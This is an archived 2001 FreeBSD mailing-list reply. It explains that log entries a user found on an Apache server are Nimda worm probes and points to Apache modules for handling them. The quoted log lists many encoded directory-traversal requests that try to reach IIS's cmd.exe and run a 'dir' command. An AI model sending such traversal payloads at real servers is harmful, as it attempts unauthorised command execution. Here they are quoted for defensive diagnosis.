Date: Tue, 13 Nov 2001 23:00:56 -0500 From: Louis LeBlanc <leblanc+freebsd@keyslapper.org> To: freebsd-questions@FreeBSD.org, freebsd-questions@FreeBSD.org Subject: Re: Do these errors mean my system is comprimised? Message-ID: <20011114040055.GB25941@keyslapper.org> In-Reply-To: <0111131938440F.60958@chip.wiegand.org> References: <0111131938440F.60958@chip.wiegand.org>
index | next in thread | previous in thread | raw e-mail
[-- Attachment #1 --] On 11/13/01 07:38 PM, Chip sat at the `puter and typed: > I found the following on my apache/freebsd/php/mysql server in my log after > running analog - > Looks like someone planted something that wants NT to work correctly - > > 111: /scripts/..%255c../winnt/system32/cmd.exe > 111: /scripts/..%255c../winnt/system32/cmd.exe?/c+dir > 106: /scripts/..%5c../winnt/system32/cmd.exe > 106: /scripts/..%5c../winnt/system32/cmd.exe?/c+dir > 66: /scripts/root.exe > 66: /scripts/root.exe?/c+dir > 64: /MSADC/root.exe > 64: /MSADC/root.exe?/c+dir > 62: /c/winnt/system32/cmd.exe > 62: /c/winnt/system32/cmd.exe?/c+dir > 59: /d/winnt/system32/cmd.exe > 59: /d/winnt/system32/cmd.exe?/c+dir > 56: /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe > 56: /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir > 56: > /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe > 56: > /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir > 56: /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe > 56: /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir > 55: /scripts/..%c1%1c../winnt/system32/cmd.exe > 55: /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir > 54: /scripts/winnt/system32/cmd.exe > 54: /scripts/winnt/system32/cmd.exe?/c+dir > 54: /scripts/..%c1%9c../winnt/system32/cmd.exe > 54: /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir > 54: /scripts/..%c0%af../winnt/system32/cmd.exe > 54: /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir > 51: /scripts/..%252f../winnt/system32/cmd.exe > 51: /scripts/..%252f../winnt/system32/cmd.exe?/c+dir This is the footprint of the Nimda virus *trying* to infect your system. You can find links to specific info on what Nimda tries to do on Google, if you want to sort thru a million hits. You can also get info on how an Apache installation can handle these (or not handle them) at http://www.keyslapper.org/modules/ Look for the Apache::Nimda page, even if you don't want to report it to abuse and SecurityFocus, there are config ideas that will help you reduce the impact on your log file size. Also, look for the Apache::404 module. It will handle those misses and notify you via email - once per period for each URL. It can help you keep track of Nimda's impact on your server, and keep dead links tied up. Enough of the shameless plug. Check it out. HTH Lou -- Louis LeBlanc leblanc@keyslapper.org Fully Funded Hobbyist, KeySlapper Extrordinaire :) http://www.keyslapper.org ԿԬ Bershere's Formula for Failure: There are only two kinds of people who fail: those who listen to nobody... and those who listen to everybody. [-- Attachment #2 --] -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE78ex3eAPWYrNkRWIRAtVaAJ0U4V8SAxzA+R15aX7D6UrCIjyycQCcCb37 iubnYGQtOzpVctnRxbC155s= =e3Wa -----END PGP SIGNATURE-----help
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?20011114040055.GB25941>